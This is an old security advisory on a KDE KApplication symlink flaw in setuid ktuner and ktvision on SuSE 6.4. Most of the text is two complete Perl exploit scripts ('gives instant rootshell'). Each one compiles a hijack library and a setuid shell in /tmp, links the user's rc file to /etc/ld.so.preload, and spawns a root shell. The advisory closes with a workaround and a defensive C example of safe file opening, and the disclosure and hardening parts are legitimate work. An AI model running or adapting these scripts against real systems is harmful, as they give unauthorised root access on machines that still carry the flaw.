KDE KApplication Configuration File Security Vulnerability

Published: 2000-05-11
Updated: 2000-05-11
Severity: high
Threat: privilege escalation
Error type: configuration error
Exploitation: server mode

Affected systems

SuSE 6.4

Detailed description

KDE has a security vulnerability in the way it handles configuration files: the KApplication class does not create its configuration file safely. A local user who runs a setuid-root KDE program (for example ktvision or ktuner) can use this to create arbitrary files, which can lead to root privileges.

The problematic code is in the KApplication class:

KApplication::init() :
...
// now for the local app config file
QString aConfigName = KApplication::localkdedir();
aConfigName += "/share/config/";
aConfigName += aAppName;
aConfigName += "rc";
QFile aConfigFile( aConfigName );
...

Nothing in this function checks whether the file about to be created is a symbolic link. The rc file lives under the user's own KDE directory, so the user can replace it with a link to any file on the system (a shared-library configuration file, for example) and have that file created or overwritten with root privileges, from which full control of the system can follow.

The exploits below point the per-user rc file at /etc/ld.so.preload. ktuner runs with its caller's umask (the scripts set umask 0), so the file root creates through the link is world-writable; the attacker then fills it with the path of a shared library, which the next setuid program to run (here /usr/bin/passwd) loads and executes as root.

Test code

========================= 7350ktuner begin ================================

#!/usr/bin/perl
#
# 7350ktuner! The ktuner-hack.
# (a.k.a. kil3r for some reason :)
#
# Just execute. Gives instant rootshell kiddie!
# If only ktuner is setuid-root and vulnerable as with
# SuSE 6.4!
#
# When has this stupid race an end?
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
#

# per-user rc file that setuid-root ktuner creates in KApplication::init()
my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktunerrc";
$ENV{"PATH"}.=":/opt/kde/bin";

print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";
print "Creating hijack-lib ...\n";

# library to be listed in /etc/ld.so.preload: its time() replaces libc's
# and runs inside the next setuid program that calls time(), i.e. as root
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>

int time(void *v)
{
	chown("/tmp/boomsh", 0, 0);
	chmod("/tmp/boomsh", 06755);
	unlink("/etc/ld.so.preload");
	exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;

# the shell that boom.so chowns to root and makes setuid
open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
#include <unistd.h>

int main()
{
	char *a[] = {"/bin/sh", 0};

	setuid(0);
	setregid(0, 0);
	execve(a[0], a, 0);
	return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;

# umask 0 so the file root creates through the link is world-writable;
# point the rc file at /etc/ld.so.preload and let ktuner create it as root
umask 0;
unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;

print "Invoking vulnerable program (ktuner)...\n";
if (fork() == 0) {
	`ktuner`;
	exit 0;
} else {
	sleep(3);
	kill 9, `pidof ktuner`;
}

# /etc/ld.so.preload now exists and is writable by us
open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;

`/usr/bin/passwd`;	# let it look like if we have sth. to do. :)
sleep 3;

print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");

========================= 7350ktuner end ================================

========================= 7350ktvision begin ================================

#!/usr/bin/perl
#
# 7350ktvision! The ktvision-hack.
#
# Just execute. Gives instant rootshell kiddie!
# If only ktvision is setuid-root and vulnerable as with
# SuSE 6.4!
#
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
# Special greets to that beautiful black-dressed woman at
# the bus stop. This one is for you. :)
#

# per-user rc file that setuid-root ktvision creates in KApplication::init()
my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktvisionrc";
$ENV{"PATH"}.=":/opt/kde/bin";

print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";
print "Creating hijack-lib ...\n";

# library to be listed in /etc/ld.so.preload: its time() replaces libc's
# and runs inside the next setuid program that calls time(), i.e. as root
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>

int time(void *v)
{
	chown("/tmp/boomsh", 0, 0);
	chmod("/tmp/boomsh", 06755);
	unlink("/etc/ld.so.preload");
	exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;

# the shell that boom.so chowns to root and makes setuid
open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
#include <unistd.h>

int main()
{
	char *a[] = {"/bin/sh", 0};

	setuid(0);
	setregid(0, 0);
	execve(a[0], a, 0);
	return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;

# umask 0 so the file root creates through the link is world-writable;
# point the rc file at /etc/ld.so.preload and let ktvision create it as root
umask 0;
unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;

print "Invoking vulnerable program (ktvision)...\n";
if (fork() == 0) {
	`ktvision`;
	exit 0;
} else {
	sleep(3);
	kill 9, `pidof ktvision`;
}

# /etc/ld.so.preload now exists and is writable by us
open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;

`/usr/bin/passwd`;	# let it look like if we have sth. to do. :)
sleep 3;

print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");

========================= 7350ktvision end ================================

Solution

Temporary workaround:

Remove the setuid/setgid bits from all KDE programs. This takes away the privilege the exploits depend on; ktuner and ktvision are the programs named above, but any KDE program built on KApplication and installed setuid or setgid is exposed in the same way.

Related information
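The vulnerable pattern in KApplication::init(), and the check a privileged program in that position needs, as an added example in C. It is not KDE code and not the fix KDE shipped: open_rcfile_unsafe, open_rcfile_safe, run_demo and the paths under /tmp/kderc-demo-XXXXXX are names chosen for this example. run_demo() plants the same symlink trick as the scripts above in a private temporary directory and shows that a plain open(O_CREAT) writes through the link, while O_NOFOLLOW plus an fstat() check on the opened descriptor refuses it and still accepts a genuine rc file.

```c
/* Added example for this advisory (not KDE's code, not the fix KDE shipped).
 * It reproduces the KApplication::init() pattern in C: a privileged program
 * opening an rc file at a user-controlled path. The temp-dir paths and the
 * function names are stand-ins chosen for the example. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* What QFile::open() on the rc file amounts to: open() follows a symlink at
 * the last component, so a link planted by the user redirects the write. */
int open_rcfile_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened: O_NOFOLLOW makes open() fail with ELOOP on a symlink; fstat() on
 * the descriptor (not stat() on the path, which would be a second lookup)
 * confirms a plain, unshared file owned by the expected user before truncating. */
int open_rcfile_safe(const char *path, uid_t expected_owner)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_NOCTTY, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != expected_owner || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    if (ftruncate(fd, 0) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* "ld.so.preload" stands in for /etc/ld.so.preload, "ktunerrc" is the link
 * the attacker plants where the setuid program expects its rc file.
 * Returns a bitmask: 1 = unsafe open wrote through the link, 2 = hardened
 * open refused it with ELOOP, 4 = hardened open accepts a genuine file. */
int run_demo(void)
{
    char dir[] = "/tmp/kderc-demo-XXXXXX";
    char target[256], link[256], genuine[256];
    struct stat st;
    int result = 0, fd;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/ld.so.preload", dir);
    snprintf(link, sizeof link, "%s/ktunerrc", dir);
    snprintf(genuine, sizeof genuine, "%s/genuinerc", dir);

    /* the protected file, 9 bytes of known content, then the attacker's link */
    fd = open(target, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        goto out;
    if (write(fd, "original\n", 9) != 9 || symlink(target, link) < 0) {
        close(fd);
        goto out;
    }
    close(fd);

    /* the vulnerable pattern follows the link and clobbers the target */
    fd = open_rcfile_unsafe(link);
    if (fd >= 0) {
        if (write(fd, "/tmp/boom.so\n", 13) == 13 &&
            stat(target, &st) == 0 && st.st_size == 13)
            result |= 1;
        close(fd);
    }

    /* the hardened open refuses the link ... */
    fd = open_rcfile_safe(link, getuid());
    if (fd < 0 && errno == ELOOP)
        result |= 2;
    else if (fd >= 0)
        close(fd);

    /* ... and still works for an honest file owned by the caller */
    if ((fd = open_rcfile_safe(genuine, getuid())) >= 0) {
        result |= 4;
        close(fd);
    }
out:
    unlink(link);
    unlink(target);
    unlink(genuine);
    rmdir(dir);
    return result;
}
```

O_NOFOLLOW guards only the last path component; a symlinked directory earlier in the path (~/.kde/share/config in the real case) is still followed, and the fstat() ownership check does not help a program that runs as root for the whole operation. A setuid program should therefore switch to the real user (seteuid(getuid())) before it touches anything under $HOME, or not be installed setuid at all, which is what the workaround above achieves for the whole program.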